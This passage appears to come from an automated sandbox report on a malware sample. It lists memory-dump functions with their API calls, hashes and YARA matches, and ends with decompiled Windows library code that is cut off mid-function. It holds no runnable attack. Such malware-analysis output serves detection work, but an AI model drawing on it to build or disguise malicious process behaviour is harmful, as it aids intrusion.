                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 021EFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0009A052, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateFree
                                                • String ID: .z`
                                                • API String ID: 2488874121-1441809116
                                                • Opcode ID: 06583aa9000a7f23e3c8d5a633a93bacc1638a2d284a4ada200450aac655bcff
                                                • Instruction ID: 8af24e1e7312b043d9671dffd97ea93d7e5af4fc1734bc874993aefd03d49fac
                                                • Opcode Fuzzy Hash: 06583aa9000a7f23e3c8d5a633a93bacc1638a2d284a4ada200450aac655bcff
                                                • Instruction Fuzzy Hash: 08F037B5610208AFDB14EF58DC42DEB33A9EF89314F118545FD1897242D631E8158AF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0009A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: oL
                                                • API String ID: 1279760036-2581261730
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: fb531f36ecf60f8f990f8beeb336912dc4c8dd0bca289f823f6bbc923f289a64
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: E3E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BE185B242C630F9108AF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0009A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: a291e4ec65558c5148eedba6729c149e861a9d856c25b40a8d06025144360991
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 25E012B1200208ABDB18EF99CC49EA777ACAF88750F018558BE185B242C630E9108AF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0008837B, Relevance: 3.2, APIs: 2, Instructions: 186threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: c91f70f6a9e2ca802d4037632a3fe52544aee54770627bc91c6dd2946caf0482
                                                • Instruction ID: 1f97455f5678a1c34f92ec43c89df8d14c321e7e7c526e37a7ef14b41b1fc93c
                                                • Opcode Fuzzy Hash: c91f70f6a9e2ca802d4037632a3fe52544aee54770627bc91c6dd2946caf0482
                                                • Instruction Fuzzy Hash: E961B471A01209AFDB24EF64DC86FEBB7E8FB48704F50446DF54997242DB70AA01CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000882B8, Relevance: 3.1, APIs: 2, Instructions: 67threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 35f7f3359aed0bd607925aa1331478d45cd0a2f5d2a079a344b9adbe00ec78e9
                                                • Instruction ID: 961aa8fe7c63b5c682d4700dd21bbe60b037d2e1502e212414c24db1fcb1edbd
                                                • Opcode Fuzzy Hash: 35f7f3359aed0bd607925aa1331478d45cd0a2f5d2a079a344b9adbe00ec78e9
                                                • Instruction Fuzzy Hash: FC11CC31E402297AFB21F6A4AD42FEE376CAB41B50F454059FE04BA1C3EA956A0553E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                • Instruction ID: c4677aae8ac412207fcf983d3e5240e210b60c1715605391d1e4e03da92c4e84
                                                • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                • Instruction Fuzzy Hash: DD018431A802287BFB20B6949C03FFE766C6B41F50F044119FF04BA1C2EA946A0647E6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0009A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A124
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: be69a164b90f52cdf138f11d4f4c16ae0c8f1d3ca4b73922774bedb9ce3d57f5
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 7E01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0009A1B1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: a8ce4ac86e8a780aeb390971f732c07261977d5f28395a8fd5bf8595994d4ffd
                                                • Instruction ID: a3e0cb4c47071611ccb7eb6c1179e5f1a0630b753e3b13c146205223d8353446
                                                • Opcode Fuzzy Hash: a8ce4ac86e8a780aeb390971f732c07261977d5f28395a8fd5bf8595994d4ffd
                                                • Instruction Fuzzy Hash: BBF0A9B1600205AFCB14DF40CC86EEB3369EF46220F02C068FD086B242C630E806CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0009A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 89bb538c540c149beddcab492b13c1476a756bae682638512484373e91ae5804
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: B2E01AB16002086BDB10DF49CC85EE737ADAF89650F018154BE0C57242C930E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0008F687, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 41cf4fd7be1c727a8b547ad0b288886fa6feab5e921ade36b4510162b4ea1a5a
                                                • Instruction ID: b83290345075e5a95003ef1d2274ec57d212fcecaaed57880e60582e6aacff61
                                                • Opcode Fuzzy Hash: 41cf4fd7be1c727a8b547ad0b288886fa6feab5e921ade36b4510162b4ea1a5a
                                                • Instruction Fuzzy Hash: 51E0C2326903042FEB50EEB0CC47FBA3398BF54714F494078F988DB2C3DA21D5128A14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0008F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                • Instruction ID: 61ef560bb03ba9adce2078f54508012ad0f896a2dd35becffac913c9d2969378
                                                • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                • Instruction Fuzzy Hash: A6D0A7727943043BEA10FAA49C03F6632CC7B44B14F490074F948DB3C3E960E4114165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00097D24, Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: mP\
                                                • API String ID: 0-3006667150
                                                • Opcode ID: 75f52684e6df9dbb22cd25be1eb02f0b14624588534dd083576cbfdfbf168e26
                                                • Instruction ID: 4988ee7c401ca5ec12ab6d20fb445f460033d044445d3842980f559506242150
                                                • Opcode Fuzzy Hash: 75f52684e6df9dbb22cd25be1eb02f0b14624588534dd083576cbfdfbf168e26
                                                • Instruction Fuzzy Hash: 09F02B366099C08BCB061B34B8451E8FB75AEC2514B7816D9CD895B557CB12450ACAC9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00097D7A, Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3526a70b5cd6962210d209c91a0418d72ea1c28065094a572f9b335f44398ed0
                                                • Instruction ID: 4f3f97b443c37af7939b486ec2933d876e179f4b08978d0d544101b75b23f457
                                                • Opcode Fuzzy Hash: 3526a70b5cd6962210d209c91a0418d72ea1c28065094a572f9b335f44398ed0
                                                • Instruction Fuzzy Hash: 33F08B376099C087CB0B1B74E9590F4FF31AEC3614B682AD9CCC957146C7224106D6C9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02218788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E02218788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02218460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E021FE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0221718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02218460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0221718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02218460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02218460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02218460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0221718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E021F2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0220E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E021FE2A8(_t322,  &_v68, _v16);
								if(E02215553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0220E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E021FE2A8(_t322,  &_v68, _t236);
								if(E02215553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
